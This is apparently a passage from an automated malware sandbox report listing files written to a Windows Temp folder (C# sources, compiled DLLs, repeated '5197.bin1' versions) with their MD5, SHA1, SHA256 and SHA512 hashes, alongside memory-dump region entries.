\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/4544-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP
| MD5 | ba06d89e40a9d3b36e8ac118ce494371 |
| SHA1 | bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6 |
| SHA256 | fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393 |
| SHA512 | 9b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d |
C:\Users\Admin\AppData\Local\Temp\RES7417.tmp
| MD5 | 4c841c934fa6a78ccf121587f366d0b6 |
| SHA1 | 5a4488f8d588f94bcd62cc05baca0f9e20520784 |
| SHA256 | 14f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7 |
| SHA512 | a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea |
C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.dll
| MD5 | 20304a71733030087e99660755f37ccf |
| SHA1 | 5a67e4c45d514c3fbec6fb68efa418f01978ec5b |
| SHA256 | 76f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3 |
| SHA512 | 3053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1 |
memory/4568-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline
| MD5 | 20b9b70df3d4658141b57560c7c22a38 |
| SHA1 | 0a2352c94ecad22dcba6fa906f67b78dcf3deedc |
| SHA256 | c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5 |
| SHA512 | 4a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba |
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/3680-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP
| MD5 | c4def6b5c560f90a9d42b30035510659 |
| SHA1 | 0d04c1cbda9e499aaa1f2119f0b7b084789e4574 |
| SHA256 | 1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0 |
| SHA512 | 258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f |
C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp
| MD5 | 392a9a94fc13026a8f63aba8c69dd50d |
| SHA1 | bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa |
| SHA256 | 64d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70 |
| SHA512 | 6827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197 |
C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll
| MD5 | b7802039aed10976472f4877a76f820e |
| SHA1 | f678a9ee21f18009e0f0d1ddb984e49d36e34448 |
| SHA256 | b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530 |
| SHA512 | 86433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc |
memory/1728-157-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
memory/1728-158-0x000002B370E20000-0x000002B370E5D000-memory.dmp
memory/2588-159-0x0000000008C40000-0x0000000008CE3000-memory.dmp
memory/4584-160-0x0000000000000000-mapping.dmp
memory/4752-161-0x0000000000000000-mapping.dmp
memory/3344-162-0x0000000000000000-mapping.dmp
memory/1984-163-0x0000000000000000-mapping.dmp
memory/4752-164-0x0000000000826B20-0x0000000000826B24-memory.dmp
memory/4752-165-0x00000000013F0000-0x0000000001486000-memory.dmp
memory/3396-166-0x0000023B70780000-0x0000023B70823000-memory.dmp
memory/3664-167-0x000002297F740000-0x000002297F7E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/2816-171-0x0000000000000000-mapping.dmp
memory/3520-169-0x000002A7FC800000-0x000002A7FC8A3000-memory.dmp
memory/4372-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/452-173-0x0000000000000000-mapping.dmp
memory/2588-174-0x0000000009160000-0x000000000929B000-memory.dmp
memory/2588-178-0x0000000009460000-0x000000000959A000-memory.dmp
memory/4360-182-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 6bb53db491181e660601e1440f5dc723 |
| SHA1 | c6691aaad8c7cc09fc3166e38e5c88330c50dae7 |
| SHA256 | 3cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59 |
| SHA512 | 56147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f |
memory/4180-184-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | ba1cacc02ab4d42993da9e2a00150c4e |
| SHA1 | a27f508c5a3ddd3c702157c07625d57a0ec44d39 |
| SHA256 | 9c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366 |
| SHA512 | 808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070 |
memory/676-186-0x0000000000000000-mapping.dmp
memory/2588-187-0x0000000008C40000-0x0000000008CE3000-memory.dmp
memory/4652-188-0x0000000000000000-mapping.dmp
memory/4836-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 5a48006096bd97eb23923e47e5a81f6a |
| SHA1 | 65d5f9e89cc05c17980eb41b0f609bf3e956bfa7 |
| SHA256 | 889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60 |
| SHA512 | 2d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9 |
memory/3660-191-0x0000000000000000-mapping.dmp
memory/3548-192-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | eb957e958d464123d032e63278336f4a |
| SHA1 | 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e |
| SHA256 | fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013 |
| SHA512 | b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087 |
memory/2040-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | eb957e958d464123d032e63278336f4a |
| SHA1 | 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e |
| SHA256 | fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013 |
| SHA512 | b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087 |
memory/1196-196-0x0000000000000000-mapping.dmp
memory/3320-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | c24e1e3d7e76a3f0190c8285a952ba2d |
| SHA1 | 20789bba0b334b28960a0810bc099fbb5af86618 |
| SHA256 | 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5 |
| SHA512 | c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397 |
memory/1300-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | c24e1e3d7e76a3f0190c8285a952ba2d |
| SHA1 | 20789bba0b334b28960a0810bc099fbb5af86618 |
| SHA256 | 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5 |
| SHA512 | c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397 |
memory/4216-201-0x0000000000000000-mapping.dmp
memory/2084-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2440c2ca7c021d3e23515050be042ea |
| SHA1 | 40dbec088209f383f75822fc17e5cec3c81b61b2 |
| SHA256 | e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a |
| SHA512 | 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874 |
memory/4272-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2440c2ca7c021d3e23515050be042ea |
| SHA1 | 40dbec088209f383f75822fc17e5cec3c81b61b2 |
| SHA256 | e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a |
| SHA512 | 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874 |
memory/2836-206-0x0000000000000000-mapping.dmp
memory/2564-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2eba9bd62ee1de79653a2be84b84e82 |
| SHA1 | 456899ba747afa3ac16412290ea9c6192b426cfd |
| SHA256 | 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7 |
| SHA512 | 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe |
memory/1340-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2eba9bd62ee1de79653a2be84b84e82 |
| SHA1 | 456899ba747afa3ac16412290ea9c6192b426cfd |
| SHA256 | 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7 |
| SHA512 | 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe |
memory/1748-211-0x0000000000000000-mapping.dmp
memory/1732-212-0x0000000000000000-mapping.dmp
memory/4812-213-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 2fe5b90568f0224526b668dfce8690fc |
| SHA1 | ddf7904e71def4524be263292b4d0f7a124021f5 |
| SHA256 | f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0 |
| SHA512 | 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6 |
memory/4748-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 2fe5b90568f0224526b668dfce8690fc |
| SHA1 | ddf7904e71def4524be263292b4d0f7a124021f5 |
| SHA256 | f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0 |
| SHA512 | 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6 |
memory/4912-217-0x0000000000000000-mapping.dmp
memory/4672-218-0x0000000000000000-mapping.dmp
memory/4768-219-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 69d4bb4fafa07be30e9d02f144dd90df |
| SHA1 | bf7b61a62183d31c1ba7a7c2fcf9cc0f8d24d9a8 |
| SHA256 | 558f6c6bacd134f0a35dd2b278ef66feeb0bec567ebb785aea225dd90f0f564e |
| SHA512 | 2d64dc657ef2c929b68f861e101aa157ef77bfcf86fa21ddc8ddaa775f578f8a136b84caa6139ba7579689530914e1f0db9ed99455e103467066ba6e6781e80c |
memory/5028-221-0x0000000000000000-mapping.dmp
memory/3792-222-0x0000000000000000-mapping.dmp
memory/2188-223-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 7772ff5dc05d71f2ad07ca8f5418a126 |
| SHA1 | b2fd45c5546bfb40cf4d6904a72be5fde97b4dfa |
| SHA256 | 1d64cbce762611d8d131d1d3b8a43c9f6722b494c3c6e5b20c0d6ae403a2556c |
| SHA512 | 8f1765b862d9291a13fa130ab2f4e7d096f79fd6431a93d151a1d90f6693b7c0192370c6df9af9d9bcd66264051c548c2199478ca5697cdc7168a0c5aafdfa27 |
memory/856-225-0x0000000000000000-mapping.dmp
memory/956-226-0x0000000000000000-mapping.dmp
memory/4008-227-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 2c329b982cf4084062d6eb587c7520ce |
| SHA1 | 5c1dd00777651c6822a2d10825a4f2820da2d324 |
| SHA256 | 2f973f40a634ad144626133bd6b6e9d9517427812e342bc2e299fe1b351e7815 |
| SHA512 | 6f7fbcf5f2c776cdbea8213565ba53a417ad88a50220d34b53c588e8c6a2bca2a3eca7580bc97786e794ddc15166df1442f0704e83469f5f48562950131ba046 |
memory/3360-229-0x0000000000000000-mapping.dmp
memory/4384-230-0x0000000000000000-mapping.dmp
memory/2172-231-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | b1978c722926e894cbf897ebf650ba88 |
| SHA1 | a9bc6f61c7f616d684cb229dd983b4e5ecb02c50 |
| SHA256 | a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90 |
| SHA512 | 83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9 |
C:\Users\Admin\AppData\Local\Temp\5197.bin
| MD5 | b1978c722926e894cbf897ebf650ba88 |
| SHA1 | a9bc6f61c7f616d684cb229dd983b4e5ecb02c50 |
| SHA256 | a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90 |
| SHA512 | 83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9 |